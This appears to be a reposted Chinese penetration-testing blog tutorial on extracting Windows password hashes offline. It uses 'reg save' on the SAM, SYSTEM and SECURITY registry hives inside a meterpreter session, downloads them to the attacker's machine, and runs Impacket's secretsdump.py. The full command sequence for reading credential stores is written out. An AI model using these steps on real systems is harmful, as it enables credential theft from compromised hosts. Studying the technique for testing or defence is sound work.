码迷,mamicode.com
首页 > 其他好文 > 详细

离线提取目标机hash

时间:2019-04-20 21:36:45      阅读:353      评论:0      收藏:0      [点我收藏+]

标签:方式   example   目标   攻击   ldap   style   pre   ntlm   文件   

0x01 前言

很多环境下,不允许上传或者使用mimikatz。而针对非域控的单机离线提取hash显得尤为重要。

meterpreter shell命令切到交互式cmd命令。

 

0x02 过程

技术图片

 

 

reg save 方式使得需要下载的目标机

Ps:reg save将指定子项、项的注册表值的副本保存到指定文件中

我们需要导出的hash文件

 

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

meterpreter中使用shell命令来到交互式cmd

技术图片

 

这样在c盘下就导出了三个注册表文件

技术图片

 

返回meterpreter,使用meterpreter下自带download功能来将目标机的三个注册表文件下载到攻击机

 技术图片

 

技术图片

 

下载好了后我们需要读取目标的hash

用到的工具是impacketsecretsdump.pyKali默认路径:

 

/root/impacket/examples/secretsdump.py

 

 

Ps:Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。 

 

 

命令如下:

python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL

技术图片

 

离线提取目标机hash

标签:方式   example   目标   攻击   ldap   style   pre   ntlm   文件   

原文地址:https://www.cnblogs.com/-qing-/p/10742450.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!